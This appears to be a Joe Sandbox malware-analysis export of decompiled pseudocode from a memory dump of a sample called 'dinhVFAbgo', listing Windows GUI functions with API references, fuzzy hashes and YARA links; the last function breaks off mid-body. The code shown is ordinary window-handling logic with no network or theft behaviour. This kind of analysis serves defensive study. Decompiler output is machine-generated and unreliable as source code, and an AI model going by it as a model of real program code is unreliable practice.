GetClientRect.USER32(?,?), ref: 00CC6739
ClientToScreen.USER32(?,?), ref: 00CC6752
PtInRect.USER32(?,?,?), ref: 00CC6762
WindowFromPoint.USER32(?,?), ref: 00CC6776
SetCapture.USER32(?), ref: 00CC67D5
InvalidateRect.USER32(?,00000000,00000001), ref: 00CC67F7
UpdateWindow.USER32(?), ref: 00CC6800
ReleaseCapture.USER32 ref: 00CC6850

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$CaptureClientWindow$FromInvalidatePointReleaseScreenUpdate
String ID:
API String ID: 1999979895-0
Opcode ID: c044e90e9f471b4ab4be3be62183fa03f73e6820d5c19571b8c6af670232ade6
Instruction ID: acabc0b2ba80bd742a945e4d64f356db54898bc8948959123811b887c09037d9
Opcode Fuzzy Hash: c044e90e9f471b4ab4be3be62183fa03f73e6820d5c19571b8c6af670232ade6
Instruction Fuzzy Hash: A5415B71904705DFCB619F75CA44BABBBF9FB08715F10882EE5AAD2160EB309A45CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00CD418F Relevance: 12.1, APIs: 8, Instructions: 113
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00CD418F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t40;
				intOrPtr* _t47;
				intOrPtr* _t59;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr* _t69;
				intOrPtr* _t73;
				void* _t77;
				intOrPtr* _t80;
				void* _t86;
				void* _t89;

				_t89 = __eflags;
				_t77 = __edx;
				_push(0x3c);
				E00DDD52C(0xe09ffe, __ebx, __edi, __esi);
				_t80 = __ecx;
				_t68 =  *((intOrPtr*)(E00CACEEE(__ebx, __ecx, __esi, _t89) + 4));
				E00CAFF34( *((intOrPtr*)(E00CACEEE(__ebx, __ecx, __esi, _t89) + 4)));
				_t82 = 0;
				 *((intOrPtr*)(_t86 - 4)) = 0;
				E00DDFBE0(_t80, _t86 - 0x48, 0, 0x28);
				 *((intOrPtr*)(_t86 - 0x44)) =  *((intOrPtr*)(_t86 + 8));
				 *(_t86 - 0x48) = 4;
				_t40 = SendMessageA( *(_t80 + 0x20), 0x110c, 0, _t86 - 0x48);
				_t90 = _t40;
				if(_t40 != 0) {
					SendMessageA( *(_t80 + 0x20), 0xb, 0, 0);
					_t64 =  *((intOrPtr*)(_t86 - 0x24));
					__eflags = _t64;
					if(__eflags == 0) {
						E00CAA4E7(_t64, _t68, _t80, 0, __eflags);
						asm("int3");
						return 0xe1ddf0;
					} else {
						 *((intOrPtr*)(_t86 - 0x14)) = 0;
						_t69 =  *_t64;
						__eflags = _t69;
						if(_t69 != 0) {
							 *0xe17a64(_t69,  *((intOrPtr*)(_t64 + 8)), 0, 0xe3eebc, _t86 - 0x14);
							_t47 =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0x14))))();
							_t82 = 0;
							__eflags = 0;
						} else {
							_t47 = _t86 - 0x14;
							__imp__SHGetDesktopFolder(_t47);
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							_t65 =  *((intOrPtr*)(_t86 + 8));
							 *0xe17a64(_t65,  *((intOrPtr*)(_t86 - 0x14)),  *((intOrPtr*)(_t64 + 4)));
							 *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0x16c))))();
							 *(_t86 - 0x20) = _t65;
							 *((intOrPtr*)(_t86 - 0x1c)) = E00CD3F38;
							 *((intOrPtr*)(_t86 - 0x18)) = 0;
							SendMessageA( *(_t80 + 0x20), 0x1115, 0, _t86 - 0x20);
							SendMessageA( *(_t80 + 0x20), 0xb, 1, 0);
							RedrawWindow( *(_t80 + 0x20), 0, 0, 0x105);
							_t73 =  *((intOrPtr*)(_t86 - 0x14));
							 *0xe17a64(_t73);
							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 8))))();
							E00CB0895(_t86 - 0xd,  *_t73, __eflags);
							_t59 = 1;
							__eflags = 1;
						} else {
							SendMessageA( *(_t80 + 0x20), 0xb, 1, _t82);
							goto L1;
						}
						goto L9;
					}
				} else {
					L1:
					E00CB0895(_t86 - 0xd, _t77, _t90);
					_t59 = 0;
					L9:
					return E00DDD4FA(_t59);
				}
			}

0x00cd418f
0x00cd418f
0x00cd418f
0x00cd4196
0x00cd419b
0x00cd41a2
0x00cd41a5
0x00cd41aa
0x00cd41b3
0x00cd41b6
0x00cd41c1
0x00cd41c7
0x00cd41d8
0x00cd41de
0x00cd41e0
0x00cd41f8
0x00cd41fe
0x00cd4201
0x00cd4203
0x00cd42d6
0x00cd42db
0x00cd42e1
0x00cd4209
0x00cd4209
0x00cd420c
0x00cd420e
0x00cd4210
0x00cd4234
0x00cd423a
0x00cd423c
0x00cd423c
0x00cd4212
0x00cd4212
0x00cd4216
0x00cd4216
0x00cd423e
0x00cd4240
0x00cd425a
0x00cd4266
0x00cd426e
0x00cd4273
0x00cd4279
0x00cd4289
0x00cd428c
0x00cd429a
0x00cd42aa
0x00cd42b0
0x00cd42bb
0x00cd42c1
0x00cd42c6
0x00cd42cd
0x00cd42cd
0x00cd4242
0x00cd424a
0x00000000
0x00cd424a
0x00000000
0x00cd4240
0x00cd41e2
0x00cd41e2
0x00cd41e5
0x00cd41ea
0x00cd42ce
0x00cd42d3
0x00cd42d3

APIs

__EH_prolog3.LIBCMT ref: 00CD4196
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00CD41D8
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00CD41F8
SHGetDesktopFolder.SHELL32(?), ref: 00CD4216
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00CD424A
SendMessageA.USER32(?,00001115,00000000,?), ref: 00CD428C
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00CD429A
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,00E3EEBC,?), ref: 00CD42AA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$DesktopFolderH_prolog3RedrawWindow
String ID:
API String ID: 1930222516-0
Opcode ID: 292d40b62887a20c187ce05f9a864e0259c609af36ce4e1dfa69d3141f9d54f8
Instruction ID: 9defdb323daf50465635530f86c126d2416169bfd5478404ae7146e6bfd3fc91
Opcode Fuzzy Hash: 292d40b62887a20c187ce05f9a864e0259c609af36ce4e1dfa69d3141f9d54f8
Instruction Fuzzy Hash: ED416171A44219AFDB149FA1CC89EEE7B79FF08740F104026F605B72A1DB709E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCCE3A Relevance: 12.1, APIs: 8, Instructions: 112
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CCCE3A(int __ecx, void* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr* _t56;
				intOrPtr _t59;
				RECT* _t61;
				int _t62;
				void* _t63;
				void* _t71;
				int _t72;
				void* _t73;
				int _t74;
				signed int _t77;

				_t71 = __edx;
				_t41 =  *0xe68dd4; // 0x8d2643c2
				_t42 = _t41 ^ _t77;
				_v8 = _t41 ^ _t77;
				_t72 = __ecx;
				_t61 = 0;
				if( *((intOrPtr*)(__ecx + 0x7ac)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c0)) != 0) {
					L16:
					return E00DDCBCE(_t42, _t61, _v8 ^ _t77, _t71, _t72, _t73);
				} else {
					_push(_t73);
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetWindowRect( *(__ecx + 0x20),  &_v24);
					if( *((intOrPtr*)(_t72 + 0x7a8)) == 0) {
						_t62 = _v24.left;
						_t74 = _v24.bottom;
					} else {
						_t62 = _v24.right;
						_t74 = _v24.top;
					}
					_v28 = _t74;
					if( *((intOrPtr*)(_t72 + 0x7b4)) != 0) {
						 *((intOrPtr*)(_t72 + 0xac)) = 1;
						 *((intOrPtr*)(_t72 + 0xb4)) = 1;
					}
					 *((intOrPtr*)(_t72 + 0x7c0)) = 1;
					InvalidateRect( *(_t72 + 0x20), 0, 1);
					_t67 = 0;
					if( *((intOrPtr*)(_t72 + 0x7b8)) != 0) {
						L10:
						 *((intOrPtr*)(_t72 + 0x7b0)) = TrackPopupMenu( *(_t72 + 0x7ac), 0x180, _t62, _t74, _t67,  *(_t72 + 0x20), _t67);
						goto L11;
					} else {
						_t56 =  *0xe88600; // 0x0
						if(_t56 == 0) {
							goto L10;
						}
						 *0xe17a64( *(_t72 + 0x7ac), _t62, _v28, _t72, 0);
						_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t56 + 0x14))))();
						_t67 = _t72;
						 *((intOrPtr*)(_t72 + 0x7b0)) = _t59;
						E00CB7A0A(_t62, _t72, _t71);
						L11:
						_t63 = E00CB277F(_t62, _t67, _t71, GetParent( *(_t72 + 0x20)));
						if( *((intOrPtr*)(_t72 + 0x7b0)) != 0 && _t63 != 0) {
							SendMessageA( *(_t63 + 0x20), 0x111, E00CB7697(_t72) & 0x0000ffff,  *(_t72 + 0x20));
						}
						_t61 = 0;
						 *((intOrPtr*)(_t72 + 0xac)) = 0;
						 *((intOrPtr*)(_t72 + 0xb4)) = 0;
						 *((intOrPtr*)(_t72 + 0x7c0)) = 0;
						InvalidateRect( *(_t72 + 0x20), 0, 1);
						_t42 = UpdateWindow( *(_t72 + 0x20));
						_pop(_t73);
						if( *((intOrPtr*)(_t72 + 0xb8)) != 0) {
							_t42 = ReleaseCapture();
							 *((intOrPtr*)(_t72 + 0xb8)) = 0;
						}
						goto L16;
					}
				}
			}

0x00ccce3a
0x00ccce40
0x00ccce45
0x00ccce47
0x00ccce4c
0x00ccce4e
0x00ccce56
0x00cccf9f
0x00cccfac
0x00ccce68
0x00ccce68
0x00ccce6c
0x00ccce73
0x00ccce76
0x00ccce79
0x00ccce7c
0x00ccce88
0x00ccce92
0x00ccce95
0x00ccce8a
0x00ccce8a
0x00ccce8d
0x00ccce8d
0x00ccce9a
0x00cccea5
0x00cccea7
0x00cccead
0x00cccead
0x00ccceb9
0x00cccebf
0x00cccec5
0x00cccecd
0x00cccf08
0x00cccf20
0x00000000
0x00cccecf
0x00cccecf
0x00ccced6
0x00000000
0x00000000
0x00ccceeb
0x00cccef7
0x00cccef9
0x00cccefb
0x00cccf01
0x00cccf26
0x00cccf3c
0x00cccf3e
0x00cccf5b
0x00cccf5b
0x00cccf61
0x00cccf69
0x00cccf6f
0x00cccf75
0x00cccf7b
0x00cccf84
0x00cccf8a
0x00cccf91
0x00cccf93
0x00cccf99
0x00cccf99
0x00000000
0x00cccf91
0x00cccecd

APIs

GetWindowRect.USER32 ref: 00CCCE7C
InvalidateRect.USER32(?,00000000,00000001), ref: 00CCCEBF
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00CCCF1A
GetParent.USER32(?), ref: 00CCCF29
SendMessageA.USER32(?,00000111,?,?), ref: 00CCCF5B
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 00CCCF7B
UpdateWindow.USER32(?), ref: 00CCCF84
ReleaseCapture.USER32 ref: 00CCCF93

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$InvalidateWindow$CaptureMenuMessageParentPopupReleaseSendTrackUpdate
String ID:
API String ID: 2465089168-0
Opcode ID: 3721694e562efd6e73c01161a165b1d7aea2d412f6409fd1f518f38201e94392
Instruction ID: c0f67c20af5c0081d3fa7d2039ddf0ae5a44d0dff6db89fe2fde12509716c001
Opcode Fuzzy Hash: 3721694e562efd6e73c01161a165b1d7aea2d412f6409fd1f518f38201e94392
Instruction Fuzzy Hash: 42410B70A08606FFDB089F65CC84BAAFBB5FF08701F40426EE559A2260DB746954DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2843 Relevance: 12.1, APIs: 8, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CD2843(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t30;
				void* _t63;
				void* _t65;
				void* _t70;

				_t63 = __edx;
				_push(4);
				E00DDD52C(0xe08831, __ebx, __edi, __esi);
				_t65 = __ecx;
				_t52 = 0x80004005;
				if( *0xe885c8 == 0) {
					L14:
					_t27 = _t52;
					L15:
					return E00DDD4FA(_t27);
				}
				if( *((intOrPtr*)(_t70 + 8)) == 0) {
					L3:
					_t67 = 0;
					SendMessageA( *(_t65 + 0x20), 0x1009, 0, 0);
					if( *((intOrPtr*)(_t65 + 0x154)) != 0) {
						_t67 = 0;
						SendMessageA( *(_t65 + 0x20), 0xb, 1, 0);
						RedrawWindow( *(_t65 + 0x20), 0, 0, 0x105);
						 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
						E00CB0895(_t70 - 0xd, _t63,  *(_t70 - 4));
					}
					if(_t52 >= 0 &&  *((intOrPtr*)(_t70 + 8)) != 0) {
						_t54 = _t65;
						_t30 = E00CD2FD2(_t65, _t65);
						if(_t30 != 0) {
							_t81 =  *((intOrPtr*)(_t65 + 0x16c)) - _t67;
							if( *((intOrPtr*)(_t65 + 0x16c)) == _t67) {
								_t54 = _t30;
								E00CD4C4D(_t52, _t30, _t65, _t67, _t81,  *((intOrPtr*)(_t65 + 0x158)), 1);
							}
						}
						if(E00CB277F(_t52, _t54, _t63, GetParent( *(_t65 + 0x20))) != 0) {
							SendMessageA( *(E00CB277F(_t52, _t54, _t63, GetParent( *(_t65 + 0x20))) + 0x20),  *0xe870cc, _t67, _t67);
						}
					}
					goto L14;
				}
				E00CD3D6F(__ecx);
				_t52 = E00CD313E(0x80004005, _t65, _t65,  *((intOrPtr*)(_t70 + 8)));
				if(_t52 < 0) {
					goto L15;
				}
				goto L3;
			}

0x00cd2843
0x00cd2843
0x00cd284a
0x00cd284f
0x00cd2858
0x00cd285d
0x00cd298f
0x00cd298f
0x00cd2991
0x00cd2996
0x00cd2996
0x00cd2867
0x00cd2882
0x00cd2882
0x00cd288e
0x00cd289a
0x00cd2904
0x00cd290e
0x00cd291e
0x00cd2924
0x00cd292b
0x00cd292b
0x00cd2932
0x00cd293a
0x00cd293c
0x00cd2943
0x00cd2945
0x00cd294b
0x00cd2955
0x00cd2957
0x00cd2957
0x00cd294b
0x00cd296d
0x00cd2989
0x00cd2989
0x00cd296d
0x00000000
0x00cd2932
0x00cd2869
0x00cd2878
0x00cd287c
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00CD284A
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 00CD288E
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00CD28B7
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00CD290E
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000004), ref: 00CD291E
GetParent.USER32(?), ref: 00CD295F
GetParent.USER32(?), ref: 00CD2972
SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00CD2989

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$Parent$H_prolog3RedrawWindow
String ID:
API String ID: 2708892647-0
Opcode ID: 714f866af55a235a02b740b908862fad1727c6cf3a02bc5a4a165697eb7241cc
Instruction ID: 37e94fd4bbfce2fc873d85a35609d709f21a06a48cab38326b08fcfcdcb12ea8
Opcode Fuzzy Hash: 714f866af55a235a02b740b908862fad1727c6cf3a02bc5a4a165697eb7241cc
Instruction Fuzzy Hash: 1231AB30300211ABCB296B61CC5DBEEBE72FF54751F040116FA896A2A5CF719994EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CC659A Relevance: 12.1, APIs: 8, Instructions: 100
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00CC659A(signed int __ecx, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __esi;
				void* __ebp;
				int _t31;
				long _t32;
				intOrPtr _t38;
				struct HWND__* _t46;
				void* _t54;
				signed int _t56;
				int _t59;

				_t54 = __edx;
				_push(__ecx);
				_t56 = __ecx;
				_t59 = 0;
				_t50 = 1;
				if( *((intOrPtr*)(__ecx + 0xac)) == 0 ||  *((intOrPtr*)(__ecx + 0xb0)) == 0) {
					L3:
					_t31 = _t59;
					goto L4;
				} else {
					_t31 = 1;
					if( *((intOrPtr*)(__ecx + 0xb4)) != 0) {
						L4:
						 *(_t56 + 0xac) = _t59;
						 *(_t56 + 0xb0) = _t59;
						 *(_t56 + 0xb4) = _t59;
						if(_t31 != 0 &&  *((intOrPtr*)(_t56 + 0xcc)) != _t59) {
							if( *((intOrPtr*)(_t56 + 0xc4)) == _t59) {
								__eflags =  *((intOrPtr*)(_t56 + 0xc8)) - _t59;
								if(__eflags != 0) {
									__eflags =  *(_t56 + 0xc0) - _t59;
									if(__eflags == 0) {
										 *(_t56 + 0xc0) = _t50;
										_t50 = _t56;
										E00CC7494(_t56, _t54, _t59);
									}
								}
							} else {
								 *(_t56 + 0xc0) = 0 |  *(_t56 + 0xc0) == _t59;
							}
						}
						_t46 =  *(_t56 + 0x20);
						if( *(_t56 + 0xa8) != _t59) {
							 *(_t56 + 0xa8) = _t59;
							_t38 = E00CB277F(_t46, _t50, _t54, GetParent(_t46));
							_v8 = _t38;
							if(_t38 != 0) {
								SendMessageA( *(_v8 + 0x20), 0x111, E00CB7697(_t56) & 0x0000ffff,  *(_t56 + 0x20));
								_t59 = 0;
							}
						}
						_t32 = IsWindow(_t46);
						_t72 = _t32;
						if(_t32 != 0) {
							RedrawWindow( *(_t56 + 0x20), _t59, _t59, 0x105);
							E00CB236A(_t46, _t56, _t72);
							_t32 = IsWindow(_t46);
							if(_t32 != 0) {
								if( *(_t56 + 0xb8) != _t59) {
									ReleaseCapture();
									 *(_t56 + 0xb8) = _t59;
								}
								if( *((intOrPtr*)(_t56 + 0xdc)) > _t59) {
									KillTimer( *(_t56 + 0x20), 0xec0d);
								}
								_t32 =  *(_t56 + 0x78c);
								if(_t32 != 0 &&  *(_t32 + 0x20) != 0) {
									_t32 = SendMessageA( *(_t32 + 0x20), 0x41c, _t59, _t59);
								}
							}
						}
						return _t32;
					}
					goto L3;
				}
			}

0x00cc659a
0x00cc659d
0x00cc65a1
0x00cc65a3
0x00cc65a7
0x00cc65ae
0x00cc65c2
0x00cc65c2
0x00000000
0x00cc65b8
0x00cc65b8
0x00cc65c0
0x00cc65c4
0x00cc65c4
0x00cc65ca
0x00cc65d0
0x00cc65d8
0x00cc65e8
0x00cc65fd
0x00cc6603
0x00cc6605
0x00cc660b
0x00cc660d
0x00cc6613
0x00cc6615
0x00cc6615
0x00cc660b
0x00cc65ea
0x00cc65f5
0x00cc65f5
0x00cc65e8
0x00cc661a
0x00cc6623
0x00cc6626
0x00cc6633
0x00cc6638
0x00cc663d
0x00cc6659
0x00cc665f
0x00cc665f
0x00cc663d
0x00cc6662
0x00cc6668
0x00cc666a
0x00cc6676
0x00cc667e
0x00cc6684
0x00cc668c
0x00cc6694
0x00cc6696
0x00cc669c
0x00cc669c
0x00cc66a8
0x00cc66b2
0x00cc66b2
0x00cc66b8
0x00cc66c0
0x00cc66d2
0x00cc66d2
0x00cc66c0
0x00cc668c
0x00cc66dc
0x00cc66dc
0x00000000
0x00cc65c0

APIs

GetParent.USER32(?), ref: 00CC662C
SendMessageA.USER32(?,00000111,?,?), ref: 00CC6659
IsWindow.USER32(?), ref: 00CC6662
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00CC6676
IsWindow.USER32(?), ref: 00CC6684
ReleaseCapture.USER32 ref: 00CC6696
KillTimer.USER32(?,0000EC0D), ref: 00CC66B2
SendMessageA.USER32(00000000,0000041C,00000000,00000000), ref: 00CC66D2

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$MessageSend$CaptureKillParentRedrawReleaseTimer
String ID:
API String ID: 3014619129-0
Opcode ID: 1d4b21af2977c355e29fb43ba81fcd1ed9890361ee0c65b2e22615de85d5ec94
Instruction ID: 154cff93c086f1963d69adddfaf552db959834c16c2100735d2aecb6ca416e7f
Opcode Fuzzy Hash: 1d4b21af2977c355e29fb43ba81fcd1ed9890361ee0c65b2e22615de85d5ec94
Instruction Fuzzy Hash: E7314C71705A22EFD7299F35C948FAAFA69FB04B52F04422EF06992150DB709950CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 00D4C2D7 Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00D4C2D7(void* __ecx, void* __edx, void* __eflags, struct tagPOINT _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				intOrPtr* _t35;
				void* _t53;
				intOrPtr* _t59;
				void* _t64;
				intOrPtr* _t65;
				intOrPtr* _t66;
				signed int _t68;

				_t64 = __edx;
				_t54 = __ecx;
				_t27 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t27 ^ _t68;
				_t53 = __ecx;
				ScreenToClient( *(__ecx + 0x20),  &_a4);
				_v24.left = 0;
				_v24.top = 0;
				_v24.right = 0;
				_v24.bottom = 0;
				_t66 = E00CACA6C(0xe68550, E00CB277F(_t53, _t54, _t64, GetParent( *(_t53 + 0x20))));
				if(_t66 == 0) {
					L7:
					_t35 = 0;
				} else {
					_t59 = _t66;
					while(1) {
						_t65 = E00D12636(_t59, _t64, _t66);
						if(_t65 == 0) {
							break;
						}
						 *0xe17a64();
						_t66 =  *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0x1c8))))();
						GetClientRect( *(_t66 + 0x20),  &_v24);
						MapWindowPoints( *(_t66 + 0x20),  *(_t53 + 0x20),  &_v24, 2);
						_push(_a8);
						if(PtInRect( &_v24, _a4.x) != 0) {
							L9:
							_t35 = _t66;
						} else {
							_t66 = _t65;
							_t59 = _t65;
							continue;
						}
						goto L8;
					}
					_t66 = E00D12691(_t66);
					if(_t66 == 0) {
						goto L7;
					} else {
						GetClientRect( *(_t66 + 0x20),  &_v24);
						MapWindowPoints( *(_t66 + 0x20),  *(_t53 + 0x20),  &_v24, 2);
						_push(_a8);
						if(PtInRect( &_v24, _a4) != 0) {
							goto L9;
						} else {
							goto L7;
						}
					}
				}
				L8:
				return E00DDCBCE(_t35, _t53, _v8 ^ _t68, _t64, _t65, _t66);
			}

0x00d4c2d7
0x00d4c2d7
0x00d4c2dd
0x00d4c2e4
0x00d4c2ea
0x00d4c2f3
0x00d4c2fe
0x00d4c301
0x00d4c304
0x00d4c307
0x00d4c321
0x00d4c327
0x00d4c3c9
0x00d4c3c9
0x00d4c32d
0x00d4c32d
0x00d4c37e
0x00d4c383
0x00d4c387
0x00000000
0x00000000
0x00d4c33b
0x00d4c345
0x00d4c34e
0x00d4c360
0x00d4c366
0x00d4c378
0x00d4c3dc
0x00d4c3dc
0x00d4c37a
0x00d4c37a
0x00d4c37c
0x00000000
0x00d4c37c
0x00000000
0x00d4c378
0x00d4c390
0x00d4c394
0x00000000
0x00d4c396
0x00d4c39d
0x00d4c3af
0x00d4c3b5
0x00d4c3c7
0x00000000
0x00000000
0x00000000
0x00000000
0x00d4c3c7
0x00d4c394
0x00d4c3cb
0x00d4c3d9

APIs

ScreenToClient.USER32 ref: 00D4C2F3
GetParent.USER32(?), ref: 00D4C30A
GetClientRect.USER32(?,?), ref: 00D4C34E
MapWindowPoints.USER32 ref: 00D4C360
PtInRect.USER32(?,?,?), ref: 00D4C370
GetClientRect.USER32(?,?), ref: 00D4C39D
MapWindowPoints.USER32 ref: 00D4C3AF
PtInRect.USER32(?,?,?), ref: 00D4C3BF

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Client$PointsWindow$ParentScreen
String ID:
API String ID: 1944725958-0
Opcode ID: db1ade2d7fa901f1583d085bcbe7fc84e6dac7e118e077404b95c3afb531a984
Instruction ID: d3793903131fe8c411388df793589c0d980ed383ebf33e04b791c56d141d21f8
Opcode Fuzzy Hash: db1ade2d7fa901f1583d085bcbe7fc84e6dac7e118e077404b95c3afb531a984
Instruction Fuzzy Hash: 44318F72A14609AFCF119FA5DD489FE7BB9FF08700B108169F946E7260EB31DE049B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CDF6C9 Relevance: 12.1, APIs: 8, Instructions: 95
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00CDF6C9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t39;
				void* _t48;
				void* _t63;
				void* _t79;
				void* _t81;
				signed int* _t82;
				signed int* _t83;
				void* _t84;

				_t77 = __edx;
				_t62 = __ebx;
				_push(0x3c);
				E00DDD52C(0xe0aad9, __ebx, __edi, __esi);
				_t79 = __ecx;
				_t81 = 0;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					L12:
					_t39 = 0;
					__eflags = 0;
				} else {
					_t87 =  *((intOrPtr*)(__ecx + 0x18));
